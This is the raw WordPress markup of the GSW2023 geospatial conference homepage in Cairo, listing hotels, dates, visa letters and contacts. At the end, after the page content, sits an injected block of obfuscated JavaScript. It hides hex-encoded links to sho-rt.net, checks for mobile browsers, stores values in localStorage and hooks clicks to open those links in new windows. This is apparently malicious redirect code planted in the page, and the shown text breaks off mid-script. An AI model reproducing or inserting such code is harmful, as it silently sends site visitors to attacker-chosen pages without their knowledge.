size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 